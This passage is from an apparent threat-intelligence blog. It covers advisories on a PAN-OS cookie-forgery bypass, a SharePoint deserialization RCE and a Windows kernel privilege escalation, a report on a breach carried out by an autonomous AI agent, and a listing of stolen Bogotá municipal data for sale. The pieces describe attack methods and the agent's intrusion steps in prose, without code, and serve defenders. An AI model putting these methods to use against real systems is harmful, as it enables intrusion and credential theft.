platform personnel knew, how reports were handled, whether prohibited material was repeatedly uploaded, and whether moderation or detection systems were adequate. The seizure does not by itself establish criminal responsibility on the part of the platform, its administrators, or its hosting provider. The investigation remains ongoing, and Dutch authorities have not announced any charges. The case demonstrates how hosting infrastructure can become a central source of evidence in investigations involving user-generated platforms. Server data may help authorities connect uploads to accounts, trace administrative actions, identify victims and perpetrators, and determine whether illegal material was knowingly allowed to remain online. ### Trusting a Cookie It Never Issued: The PAN-OS GlobalProtect Authentication Bypass (CVE-2026-0257) URL: https://darkwebinformer.com/trusting-a-cookie-it-never-issued-the-pan-os-globalprotect-authentication-bypass-cve-2026-0257/ Last updated: 2026-07-21T17:53:10.000Z High CVSS (Revised) 7.8 Status Actively Exploited CISA KEV Added 2026-05-29 # Trusting a Cookie It Never Issued: The PAN-OS GlobalProtect Authentication Bypass (CVE-2026-0257) Palo Alto Networks PAN-OS • CWE-565 Reliance on Cookies Without Validation • Disclosed 2026-05-13 ## Vulnerability Overview [CVE-2026-0257](https://security.paloaltonetworks.com/CVE-2026-0257) is an authentication bypass in the **GlobalProtect portal and gateway** components of Palo Alto Networks PAN-OS software. A remote, unauthenticated attacker can forge an authentication override cookie and establish an unauthorized VPN connection to an affected firewall, landing inside the network perimeter the VPN exists to protect. Palo Alto Networks disclosed it on May 13, 2026 with a CVSS v4.0 score of just **4.7 (Medium)**. That assessment did not survive contact with reality: after Rapid7 published a technical analysis and working proof-of-concept on May 29, Palo Alto revised the score up to **7.8**, and CISA added the flaw to the Known Exploited Vulnerabilities catalog the same day, with a federal remediation deadline of June 1, 2026\. Panorama and Cloud NGFW are not affected. Bottom Line Do not triage this by its original "medium" rating. Exploitation has been observed in the wild since May 17, 2026, working exploit code is public, and a successful attack places an unauthenticated stranger on your internal network. If your GlobalProtect deployment meets the three configuration conditions below, treat it as urgent. CVE ID CVE-2026-0257 CVSS (Original) 4.7 - Medium CVSS (Revised) 7.8 - High Weakness CWE-565 Affected Product PAN-OS / Prisma Access Not Affected Panorama, Cloud NGFW Attack Vector Network / Unauthenticated Exploit Status Public PoC + In the Wild ## Why Edge VPN Appliances Are Prime Targets A VPN gateway is, by definition, internet-facing and, by design, a doorway into the internal network. That combination makes GlobalProtect and its peers among the most attacked assets in the enterprise. An authentication bypass here is not a step in a chain so much as the whole chain compressed: no phishing, no malware delivery, no credential theft. The attacker simply asks the gateway for a session and the gateway agrees. Palo Alto firewalls in particular sit at the perimeter of a very large number of organizations, so a bug that produces valid VPN sessions from nothing is exactly the sort of thing opportunistic and targeted actors both prioritize. ## Technical Analysis The weakness is classified as **CWE-565: Reliance on Cookies without Validation and Integrity Checking**, and the mechanism is a clean example of the class. GlobalProtect supports an authentication override cookie, a convenience feature that lets a returning client skip re-authentication. The design flaw, as described in [Arctic Wolf's analysis](https://arcticwolf.com/resources/blog/cve-2026-0257-pan-os-globalprotect-authentication-bypass/), is that vulnerable PAN-OS versions trust any authentication override cookie they can successfully decrypt, without verifying that the device itself legitimately generated it. Decryptability is treated as proof of authenticity, which it is not. That assumption collapses when the same certificate is used both to secure the GlobalProtect HTTPS service and to encrypt the authentication override cookies. In that configuration, the key material an attacker needs is being handed to anyone who connects: they retrieve the certificate chain straight from the public-facing HTTPS service, then use it to forge a well-formed cookie for any username they like, including administrators. The firewall decrypts the forged cookie, finds it well-formed, and issues a session. Public exploit tooling automates the whole sequence, connecting to the target, extracting the certificate, and minting a cookie for a chosen user. Exploitation depends on three configuration conditions being true at once: | # | Required Condition | | - | --------------------------------------------------------------------------------------------------------------- | | 1 | A GlobalProtect portal or gateway is enabled | | 2 | Authentication override cookies are enabled | | 3 | The same certificate secures both the GlobalProtect HTTPS service and authentication override cookie encryption | Those conditions are why the initial score was modest. They are also common enough in real deployments that exploitation succeeded across numerous organizations, which is why the score moved. ## Active Exploitation [Rapid7 MDR identified successful exploitation across numerous customers](https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257/), with the earliest observed activity on May 17, 2026, four days after disclosure and well before the public PoC. Their telemetry showed a consistent fingerprint: Cloud Authentication Service (CAS) disabled, with authentication override cookies enabled on the portal or gateway. In the first wave, the appliance accepted forged cookies in 8 of 10 impacted MDR customers without a full VPN session being established, indicating authentication probing rather than completed access. A second wave followed on May 21, originating from the hosting provider Dromatics Systems. Rapid7 attributes both waves to the same threat actor based on a consistent MAC address, and in this later wave observed **VPN IP assignment following cookie authentication, granting actual access to the internal network**. That is the difference between a probe and an intrusion. [Unit 42 confirmed active exploitation](https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/) by an unidentified threat actor, noting that only a small portion of probed devices actually established VPN sessions, and that no post-access behavior or lateral movement had been identified at the time of reporting. Arctic Wolf and eSentire both reported continued exploitation into early June. The absence of observed lateral movement is a reason for cautious relief, not complacency: unauthenticated network access was demonstrably achieved. ## Am I Affected? Check the three conditions above. Palo Alto's advisory documents how to verify whether authentication override cookies are enabled: in the management interface, navigate to **Network > GlobalProtect > Portals**, select your portal, open the **Agent** tab, and inspect the agent configuration profile. Rapid7 Labs also released a proof-of-concept script that lets defenders safely validate whether an appliance is vulnerable by simulating the bypass condition under controlled circumstances. Both PAN-OS physical and virtual firewalls and Prisma Access are in scope; Panorama and Cloud NGFW are not. ## Mitigation & Remediation 1. **Upgrade to a fixed PAN-OS release.** Confirm the fixed version for your specific train against the Palo Alto Networks advisory and upgrade. Prisma Access customers are being upgraded by Palo Alto per the schedule shared with customers. 2. **Disable the authentication override feature.** If you cannot patch immediately, turning off authentication override cookies removes the second required condition and closes the attack path. 3. **Or split the certificates.** As an alternative workaround, generate a new certificate used exclusively for authentication override cookie encryption, so that key material is no longer exposed through the public HTTPS service. This breaks the third condition. 4. **Hunt using the published indicators.** Review GlobalProtect logs for successful gateway-connected events from the IP addresses listed in the Unit 42 threat brief, and for suspicious host IDs or device names. Unit 42 also documented hard-coded client configuration values from the public PoC, such as a Windows 10 Pro 64-bit endpoint OS string, that make post-PoC exploitation attempts identifiable in logs. 5. **Treat successful gateway connections as incidents.** Unit 42 advises activating incident response protocols for any successful gateway-connected event matching these indicators, since that represents an actual VPN session rather than a failed probe. ## The Bigger Picture Two lessons stand out. The first is cryptographic hygiene: reusing one certificate for two purposes turned a private signing operation into a public one. Key separation is not bureaucratic ceremony, it is the property that keeps a convenience feature from becoming an authentication bypass. The design error underneath it is subtler and more common than it looks, namely treating "I could decrypt this" as equivalent to "I must have issued this." Decryption proves a key relationship; only a validated signature or server-side session state proves authenticity. The second lesson is about severity scores as a triage input rather than an answer. CVE-2026-0257 shipped as a 4.7 medium because its preconditions are specific, and plenty of organizations would have queued it behind bigger numbers. Attackers exploited it four days later, and the score eventually more than doubled. As Rapid7 argued, the circumstances warranted treating it as critical regardless of the rating. When a flaw sits on an internet-facing authentication boundary, the question worth asking is not what it scores, but what it grants. ## References - [Palo Alto Networks - Security Advisory CVE-2026-0257](https://security.paloaltonetworks.com/CVE-2026-0257) - [Unit 42 - Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257](https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/) - [Rapid7 - Observed Exploitation and Technical Analysis](https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257/) - [Arctic Wolf - PAN-OS GlobalProtect Authentication Bypass](https://arcticwolf.com/resources/blog/cve-2026-0257-pan-os-globalprotect-authentication-bypass/) - [eSentire - Threat Actors Exploit GlobalProtect Vulnerability](https://www.esentire.com/security-advisories/threat-actors-exploit-globalprotect-vulnerability-cve-2026-0257) - [Help Net Security - Exploitation Coverage](https://www.helpnetsecurity.com/2026/06/01/hackers-are-exploiting-palo-alto-globalprotect-vpn-authentication-bypass-cve-2026-0257/) - [CWE-565 - Reliance on Cookies without Validation and Integrity Checking](https://cwe.mitre.org/data/definitions/565.html) ### Patching Is Not Enough: Critical SharePoint Deserialization RCE Under Active Exploitation (CVE-2026-50522) URL: https://darkwebinformer.com/patching-is-not-enough-critical-sharepoint-deserialization-rce-under-active-exploitation-cve-2026-50522/ Last updated: 2026-07-21T15:34:27.000Z Critical CVSS 3.1 9.8 Status Actively Exploited Exploit Public PoC # Patching Is Not Enough: Critical SharePoint Deserialization RCE Under Active Exploitation (CVE-2026-50522) Microsoft SharePoint Server • CWE-502 Deserialization of Untrusted Data • Released 2026-07-14 ## Vulnerability Overview [CVE-2026-50522](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522) is a critical remote code execution vulnerability in on-premises **Microsoft SharePoint Server**, caused by deserialization of untrusted data (CWE-502). It shipped in Microsoft's July 14, 2026 security updates with a CVSS 3.1 base score of **9.8 (Critical)** and the vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`: network-reachable, low complexity, no privileges, no user interaction, and total impact to confidentiality, integrity, and availability. Microsoft credited DEVCORE researcher "splitline" with the discovery. Following the release of a public proof-of-concept, security firm watchTowr reported **active exploitation against on-premises deployments**, with attackers stealing SharePoint machine keys to establish persistent access. Patching Alone Will Not Save You Attackers are pulling SharePoint machine keys via a single request. Because those keys enable forged authentication tokens that survive patching, defenders must rotate credentials and machine keys on any server that may have been exposed, not simply install the update. CVE ID CVE-2026-50522 CVSS Score 9.8 - Critical Weakness CWE-502 Affected Product SharePoint Server (on-prem) Affected Versions 2016 / 2019 / Subscription Attack Vector Network / Remote Exploitation Active (Post-PoC) Fix July 2026 Updates ## Why SharePoint Keeps Getting Hit On-premises SharePoint is close to an ideal target: it is internet-facing by design in many organizations, it stores the documents and institutional knowledge an intruder most wants, and it is deeply integrated with Active Directory and the wider Microsoft estate, which makes it an excellent pivot point. It is also operationally awkward to patch, since farms are business-critical, updates require care across multiple servers, and downtime is politically expensive. The result is a large population of exposed, slow-to-update servers holding valuable data. That pressure is visible in the recent record. CVE-2026-50522 is the third SharePoint Server vulnerability to see active exploitation in this period, after CVE-2026-56164 and CVE-2026-58644, the latter two weaponized as zero-days before being fixed in July 2026\. CISA has separately warned that threat actors are exploiting multiple SharePoint Server flaws, including CVE-2026-32201, CVE-2026-45659, CVE-2026-56164, and CVE-2026-58644, to gain unauthorized access. If you run on-prem SharePoint, you are operating a product under sustained, coordinated attacker attention. ## Technical Analysis The underlying weakness is **CWE-502, deserialization of untrusted data**. Deserialization turns a byte stream back into an in-memory object. It becomes dangerous when an application reconstructs objects from attacker-controlled input without adequately restricting which types, properties, or code paths can be invoked. In .NET applications like SharePoint, an attacker who can supply a serialized payload can chain together legitimate classes ("gadgets") whose ordinary behavior, when triggered during object reconstruction, results in arbitrary command execution. The application never intended to run attacker code; it simply rebuilt an object graph that was designed to detonate. Here, attacker-controlled serialized objects reach SharePoint's processing pipeline and are loaded server-side, yielding remote code execution in the context of the SharePoint application. The CVSS vector confirms the attack requires no authentication and no user interaction and is exploitable across the network, including from the internet for exposed farms. One discrepancy is worth flagging rather than smoothing over. Microsoft's official CVSS vector specifies `PR:N` (no privileges required), and the CVE description states an *unauthorized* attacker can execute code over a network. However, at least one quoted Microsoft advisory statement in press coverage describes an attacker "authenticated as at least a Site Owner" writing arbitrary code, which would imply some privilege. That language may be carried over from a related SharePoint CVE in the same batch. Given that the authoritative vector and CVE description both indicate unauthenticated exploitation, and that active exploitation is being observed in the wild, treat this as unauthenticated for risk-planning purposes and verify specifics against MSRC. ## Active Exploitation and Machine Key Theft Microsoft initially tagged CVE-2026-50522 with an exploitability assessment of "Exploitation More Likely," and CISA's early SSVC data classified observed exploitation as none while judging the attack automatable with total technical impact. That assessment aged quickly. After a public PoC appeared, watchTowr reported detecting active exploitation against on-premises SharePoint deployments. The attacker objective reported so far is the most consequential detail in this story: **machine key theft**. SharePoint machine keys (the ASP.NET `validationKey` and `decryptionKey`) are what the platform uses to sign and encrypt `ViewState` and related tokens. An attacker who obtains them can forge trusted payloads and authentication material at will, which means they retain a durable path back into the environment *even after the vulnerability is patched*. That is precisely the pattern seen in earlier SharePoint exploitation campaigns, and it is why watchTowr's guidance emphasizes that patching is not enough and credentials on potentially exposed assets must be rotated. Attackers are reportedly retrieving these keys with a single request, so a very short window of exposure is sufficient. ## Affected Versions & Fixes | Product | Status | Resolution | | -------------------------------------- | ------------ | ------------------------------------------ | | SharePoint Enterprise Server 2016 | Vulnerable | Apply July 2026 security update | | SharePoint Server 2019 | Vulnerable | Apply July 2026 security update | | SharePoint Server Subscription Edition | Vulnerable | Apply July 2026 security update | | SharePoint Online (Microsoft 365) | Not affected | Service-side; this is an on-premises issue | Updates are delivered through the usual channels (Windows Update, WSUS, Intune update rings, Autopatch) or manually from the Microsoft Update Catalog. Confirm the exact build for each server in your farm against MSRC. ## Mitigation & Remediation Treat this as an emergency change for any internet-facing farm: 1. **Apply the July 2026 SharePoint updates immediately.** Patch every server in the farm and confirm the resulting build numbers, since a partially updated farm remains exposed. 2. **Rotate machine keys and credentials.** This is the step defenders skip and attackers count on. Rotate ASP.NET machine keys on any server that may have been exposed, restart IIS so the new keys take effect, and rotate service accounts and other credentials reachable from the farm. 3. **Reduce exposure.** Remove unnecessary internet exposure of on-premises SharePoint, place farms behind a WAF or authenticating reverse proxy, and restrict administrative interfaces to trusted networks. 4. **Hunt for compromise.** Assume pre-patch exploitation on exposed servers. Review IIS and SharePoint logs for anomalous requests to deserialization-reachable endpoints, look for unexpected `w3wp.exe` child processes such as `cmd.exe` or `powershell.exe`, hunt for newly written `.aspx` files and web shells in SharePoint layouts directories, and check for signs of forged authentication tokens or unexplained privileged access. 5. **Track the CISA guidance.** Given ongoing exploitation across several SharePoint CVEs, follow CISA's SharePoint advisories for updated indicators and detection guidance. ## The Bigger Picture Two lessons stand out. The first is that unsafe deserialization remains one of the most reliable ways to turn a web request into code execution, and it keeps surfacing in mature enterprise platforms because the vulnerable pattern is deeply embedded in how these applications pass state around. The second, and more operationally important, is that **remediation is not the same as recovery**. When an exploit's first act is to steal cryptographic key material, applying the patch closes the door but leaves the attacker holding a copy of the key. Any incident response plan for a widely exploited web platform bug needs a credential and key rotation step baked in, executed on the assumption that exposure occurred, not after waiting for proof of it. ## References - [Microsoft MSRC - CVE-2026-50522 Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522) - [The Hacker News - Under Active Exploitation After Public PoC](https://thehackernews.com/2026/07/critical-sharepoint-rce-cve-2026-50522.html) - [CVE.org - CVE-2026-50522 Record](https://www.cve.org/CVERecord?id=CVE-2026-50522) - [Tenable - CVE-2026-50522](https://www.tenable.com/cve/CVE-2026-50522) - [IONIX - Unauthenticated RCE via Deserialization](https://www.ionix.io/threat-center/cve-2026-50522/) - [CWE-502 - Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html) ### Counting Below Zero: Integer Underflow to SYSTEM in the Windows NT Kernel (CVE-2026-42980) URL: https://darkwebinformer.com/counting-below-zero-integer-underflow-to-system-in-the-windows-nt-kernel-cve-2026-42980/ Last updated: 2026-07-21T15:25:59.000Z Important CVSS 3.1 7.8 MS Assessment Exploitation More Likely Exploit None Known # Counting Below Zero: Integer Underflow to SYSTEM in the Windows NT Kernel (CVE-2026-42980) Windows NT OS Kernel • CWE-191 Integer Underflow / CWE-122 Heap Overflow • Released 2026-06-09 ## Vulnerability Overview [CVE-2026-42980](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42980) is an elevation of privilege vulnerability in the **Windows NT OS Kernel**, fixed in Microsoft's June 2026 Patch Tuesday. An integer underflow (wrap or wraparound) in the kernel allows a locally authenticated attacker to corrupt kernel memory and escalate to `NT AUTHORITY\SYSTEM`. Microsoft rates it **Important** with a CVSS 3.1 base score of **7.8**, and, more consequentially for defenders, labels it **"Exploitation More Likely."** There is no known in-the-wild exploitation or public exploit code at the time of writing, and it is not listed in the CISA KEV catalog. Bottom Line This is not a remote break-in; the attacker needs code execution on the box already. It is the second half of an intrusion, the step that converts a phished user or a compromised low-privilege service into total control of the machine. Deploy the June 2026 updates on your normal urgent-patch cadence. CVE ID CVE-2026-42980 CVSS Score 7.8 - Important Weakness CWE-191 / CWE-122 Affected Product Windows NT OS Kernel Impact SYSTEM Privileges Attack Vector Local / Authenticated Exploit Status None Known Fix June 2026 Patch Tuesday ## Why a Local EoP Still Matters Elevation of privilege bugs get less attention than pre-auth RCE, and that is a mistake. Modern intrusions are chains: initial access from phishing, a malicious document, a stolen credential, or a compromised application, followed by escalation. A reliable local EoP is the piece that turns a limited foothold into ownership of the host, and the kernel is the most valuable place to win it, because SYSTEM-level code sitting below user mode can disable security tooling, tamper with EDR, harvest credentials from memory, install persistent drivers, and stage lateral movement. The CVSS vector reflects that ceiling with high confidentiality, integrity, and availability impact, even though the attack vector is local. Microsoft's **"Exploitation More Likely"** label is the detail worth acting on. It reflects Microsoft's judgment that the bug class, the reliability of the primitive, and attacker interest make working exploit code a realistic near-term prospect. Kernel EoP flaws in this category have a long track record of being folded into commodity toolkits and ransomware playbooks after patch release, precisely because attackers can diff the patch to find the flaw. ## Technical Analysis The flaw is classified as **CWE-191 (Integer Underflow)** with an associated **CWE-122 (Heap-based Buffer Overflow)**, and that pairing tells you the shape of the bug. An integer underflow happens when an arithmetic operation drops below the minimum value the type can represent and wraps around to a very large number. In kernel code, this most often bites in size or length calculations: subtracting a header length from an attacker-influenced buffer size, for example, where a value smaller than expected causes the subtraction to wrap to an enormous unsigned value. That bogus size then propagates into a memory operation. A subsequent allocation or copy trusts the wrapped length, producing a heap-based buffer overflow that writes past the intended bounds of a kernel pool allocation, which is the CWE-122 half of the classification. Corrupting adjacent kernel heap structures is a well-understood road to privilege escalation: an attacker grooms the pool, overwrites a neighboring object's fields or function pointers, and converts that controlled corruption into an arbitrary read/write primitive, ultimately rewriting their own process token to hold SYSTEM privileges. Microsoft has not published the specific vulnerable code path, which is standard practice for kernel issues while patches roll out. Some third-party trackers associate the flaw with the kernel's memory-management code in the **Windows Management Instrumentation (WMI)** subsystem, but that attribution has not been confirmed by Microsoft and should be treated as unverified. The exploitability metrics are consistent across sources: local attack vector, low complexity, low privileges required, and no user interaction beyond already having a session on the machine. ## Affected Platforms As a flaw in the NT OS Kernel, this affects a broad sweep of supported Windows client and server releases. Reported affected platforms span Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (23H2, 24H2, 25H2, 26H1), and Windows Server releases including Server 2012\. Because kernel updates are cumulative and the exact affected build list is long, confirm your specific SKUs and build numbers against the MSRC entry rather than relying on a summary. | Item | Detail | | ------------- | ------------------------------------------------------- | | Release date | June 9, 2026 (Patch Tuesday) | | Max severity | Important | | Impact | Elevation of Privilege | | Vector string | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | | Resolution | Apply the June 2026 cumulative update for your platform | ## Mitigation & Remediation 1. **Apply the June 2026 cumulative update.** There is no configuration workaround for a kernel memory-corruption bug. Patching is the fix, and the update is cumulative, so it also closes the other kernel and DWM escalation flaws shipped in the same release. 2. **Prioritize by exposure, not just by score.** A 7.8 local EoP deserves faster treatment than the number suggests on multi-user systems, terminal and RDS servers, jump boxes, developer workstations, and anywhere untrusted users or internet-facing services already execute code. 3. **Reduce the value of the foothold.** Enforce least privilege, keep users out of local administrator groups, segment high-value hosts, and ensure application allowlisting so that an attacker's initial code execution is harder to obtain in the first place. 4. **Monitor for escalation behavior.** Watch for unexpected SYSTEM-level processes, token manipulation, new driver or service installation, and EDR tampering, since those are the observable outcomes of a successful kernel escalation even when the exploit itself is invisible. ## The Bigger Picture CVE-2026-42980 landed in a June 2026 Patch Tuesday that included multiple escalation flaws rated more likely to be exploited, alongside publicly disclosed issues elsewhere in the platform. That pattern is the normal rhythm of Windows security now: a steady supply of local privilege escalation bugs in kernel-adjacent components, any one of which is enough to complete an attack chain that started somewhere far less exotic. Integer underflow in particular remains stubbornly common in large C and C++ codebases, because the unsafe arithmetic looks perfectly reasonable in isolation and only becomes dangerous when an attacker controls one of the inputs. For defenders the response is unglamorous and effective: patch on schedule, assume the initial foothold will eventually happen, and design so that owning one user account does not mean owning the machine. ## References - [Microsoft MSRC - CVE-2026-42980 Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42980) - [NVD - CVE-2026-42980](https://nvd.nist.gov/vuln/detail/CVE-2026-42980) - [Qualys ThreatPROTECT - June 2026 Patch Tuesday Review](https://threatprotect.qualys.com/2026/06/09/microsoft-patch-tuesday-june-2026-security-update-review/) - [Hive Pro - Microsoft June 2026 Patch Tuesday Advisory](https://www.hivepro.com/threat-advisory/microsoft-june-2026-patch-tuesday) - [CWE-191 - Integer Underflow (Wrap or Wraparound)](https://cwe.mitre.org/data/definitions/191.html) - [CWE-122 - Heap-based Buffer Overflow](https://cwe.mitre.org/data/definitions/122.html) ### Hugging Face Breach Linked to Autonomous AI Agent Exposes Internal Datasets and Credentials URL: https://darkwebinformer.com/hugging-face-breach-linked-to-autonomous-ai-agent-exposes-internal-datasets-and-credentials/ Last updated: 2026-07-20T16:57:14.000Z Hugging Face has disclosed a security breach in which an autonomous AI agent system compromised part of its production infrastructure and gained access to internal datasets and service credentials. The company detected the intrusion earlier in July and published a detailed [security incident disclosure](https://huggingface.co/blog/security-incident-july-2026) on July 16\. Hugging Face described the attack as being driven end to end by an autonomous agent framework rather than merely assisted by an AI chatbot or individual automated script. The company is still investigating whether any partner or customer information was affected. However, Hugging Face says it has found no evidence that public models, user-facing datasets, Spaces, container images, or published software packages were altered. ### Malicious Dataset Provided Initial Access The intrusion began inside the platform’s data-processing pipeline, an attack surface that is particularly important for services that automatically inspect and process user-submitted AI datasets. According to Hugging Face, a malicious dataset exploited two separate code-execution paths: a remote-code dataset loader and a template-injection vulnerability inside a dataset configuration. These weaknesses allowed attacker-controlled code to execute on a processing worker. From there, the autonomous system escalated to node-level access, harvested cloud and cluster credentials, and moved laterally into [several internal clusters](https://www.bleepingcomputer.com/news/security/hugging-face-breach-autonomous-ai-agent-system-internal-datasets-credentials/) over the course of a weekend. The attacker reportedly used a swarm of short-lived sandboxes to perform thousands of individual actions. Command-and-control infrastructure was self-migrating and staged through public services, making the activity more resilient and difficult to follow. Hugging Face said the framework resembled an agentic security-research harness, but the company has not identified which language model powered the operation. It could have involved a jailbroken commercial model, an unrestricted open-weight model, or another system. ### More Than 17,000 Attacker Events Analyzed Hugging Face recorded more than [17,000 events associated with the intrusion](https://www.securityweek.com/hugging-face-hacked-in-autonomous-ai-attack/). The company used AI-assisted detection to initially surface the compromise. Its security pipeline applies language models to telemetry to separate meaningful activity from routine background noise and correlate potentially related signals. After detecting the intrusion, Hugging Face ran additional analysis agents across the complete attacker activity log. The system reconstructed the timeline, mapped exposed credentials, extracted indicators of compromise, and separated genuine activity from decoys. Hugging Face said this reduced work that might normally require days to a matter of hours, allowing defenders to investigate at a speed closer to that of the autonomous attacker. ### Hosted AI Guardrails Blocked Forensic Analysis The company also encountered an unusual obstacle while investigating the breach. Hugging Face initially attempted to process the attacker logs using frontier models accessed through commercial APIs. Those models blocked the requests because the logs contained real attack commands, exploit payloads, and command-and-control artifacts. The safety systems could not reliably distinguish legitimate incident-response analysis from a user seeking assistance with offensive cyber activity. Hugging Face instead performed the forensic analysis using [GLM 5.2](https://huggingface.co/blog/security-incident-july-2026), an open-weight model operated on its own infrastructure. This allowed the company to examine the malicious content without triggering external safety restrictions and prevented attack data or credentials referenced in the logs from leaving its environment. The company said the incident exposed an operational asymmetry. Attackers can use unrestricted or modified models without safety policies, while defenders relying only on hosted models may be blocked from examining the same malicious material during an emergency. ### Compromised Nodes Rebuilt and Credentials Rotated Hugging Face says it has closed both dataset code-execution paths used for initial access. The company also removed the attacker’s foothold from affected clusters, rebuilt compromised nodes, revoked and rotated exposed credentials and tokens, and began a wider precautionary rotation of secrets. Additional cluster guardrails and stricter admission controls have been deployed. Detection and alerting systems were also changed so that high-severity activity can page an incident responder within minutes regardless of the day or time. Hugging Face is working with external forensic specialists and has [reported the incident to law enforcement](https://www.bleepingcomputer.com/news/security/hugging-face-breach-autonomous-ai-agent-system-internal-datasets-credentials/). ### Users Advised to Rotate Access Tokens Although there is no evidence that public-facing repositories or software packages were modified, Hugging Face is advising users to rotate their access tokens as a precaution. Users should also review recent account activity for unfamiliar logins, repository changes, new access grants, or other suspicious behavior. Organizations using Hugging Face tokens inside development pipelines should identify where those credentials are stored and replace them in CI/CD systems, cloud secrets managers, applications, notebooks, and local environment files. The breach shows that autonomous offensive tooling is no longer limited to controlled demonstrations. An agent can now repeatedly probe infrastructure, adapt its actions, collect credentials, move between systems, and maintain command-and-control activity at machine speed. For AI platforms, datasets and model-processing pipelines must be treated as untrusted code surfaces. Files uploaded for automatic processing require isolation, strict sandboxing, minimal worker permissions, short-lived credentials, and controls that prevent a compromised processing node from reaching broader production infrastructure. ### Bogotá Mobility Secretariat Allegedly Breached, 5.6GB of Traffic Agent and Citation Data Listed for $500 URL: https://darkwebinformer.com/bogota-mobility-secretariat-allegedly-breached-5-6gb-of-traffic-agent-and-citation-data-listed-for-500/ Last updated: 2026-07-20T16:19:27.000Z Breach Report ![Colombia flag](https://flagcdn.com/w40/co.png)Colombia Government / Municipal Data for Sale ## Bogotá Mobility Secretariat Allegedly Breached, 5.6GB of Traffic Agent and Citation Data Listed for $500 A threat actor posting under the alias **PescobarLegado**, working with a group identified in the post as **NyxarGroup**, claims to have obtained internal data from the **Secretaría Distrital de Movilidad de Bogotá**, the mobility authority under the **Bogotá Mayor's Office** in Colombia. The listing describes roughly **5.6GB** across PDF, XLSX, JPEG, and DOCX files, said to cover traffic citation imagery, civil traffic agent personnel records, CACTT scheduling, occupational fitness certificates, labor surcharge records, service orders, and duty rosters. Sample material posted alongside the listing appears to show **identity documents, agent portrait photos, and completed citation forms**. The asking price is **$500**. The claim is **unverified**. Severity HIGH Data5.6GB Price$500 Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia ActorPescobarLegado ### ▣Post details TargetSecretaría Distrital de Movilidad de Bogotá Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia SectorGovernment / Municipal transport ListingData for sale — $500 Volume5.6GB (PDF, XLSX, JPEG, DOCX) DataCitations, agents, rosters, medical ObservedJul 20, 2026 ActorPescobarLegado / NyxarGroup ### !Allegedly included - Traffic citation images - Civil traffic agent details - Social security & contracts - Employment certificates - Confidentiality agreements - CACTT scheduling (Apr–Jul) - Medical fitness certificates - Labor surcharge records - Service orders - Scheduling rosters ### ◱Screenshots [ ![Bogotá Mobility Secretariat data breach forum post screenshot, July 2026 (1 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298735.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298735.png) [ ![Bogotá Mobility Secretariat data breach forum post screenshot, July 2026 (2 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298736.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298736.png) [ ![Bogotá Mobility Secretariat data breach forum post screenshot, July 2026 (3 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298737.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298737.png) [ ![Bogotá Mobility Secretariat data breach forum post screenshot, July 2026 (4 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298738.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298738.png) [ ![Bogotá Mobility Secretariat data breach forum post screenshot, July 2026 (5 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298739.png) Screenshot 5 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2879352798359782598762357986298739.png) ### ⚠Potential impact The material described here is unusually personal for a municipal transport dataset. Alongside citation records tied to members of the public, the listing claims to hold **full personnel files for civil traffic agents**, including national identity numbers, government email addresses, contracts, and occupational medical certificates. Health data of this kind carries heightened protection under Colombian data protection law and is rarely recoverable once exposed. Publishing agent photographs together with names, ID numbers, shift patterns, and assigned street posts is the more acute concern: it maps identifiable enforcement personnel to predictable times and locations, creating a direct risk of targeting, intimidation, or retaliation. Citation records also expose vehicle owners, plates, and addresses, which feed straightforwardly into impersonation and fraud. The claim is unverified. ### iStatus Unverified The post is a sale listing with sample material attached and a Session address given for contact, promoted through the forum's escrow service. The seller account is newly established with minimal posting history. The claim is **unverified**, and the Bogotá Mayor's Office and Mobility Secretariat have not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Georgian Court Systems and the High Council of Justice Allegedly Breached, 5TB of Judiciary Data for Sale URL: https://darkwebinformer.com/georgian-court-systems-and-the-high-council-of-justice-allegedly-breached-5tb-of-judiciary-data-for-sale/ Last updated: 2026-07-20T15:56:19.000Z Breach Report 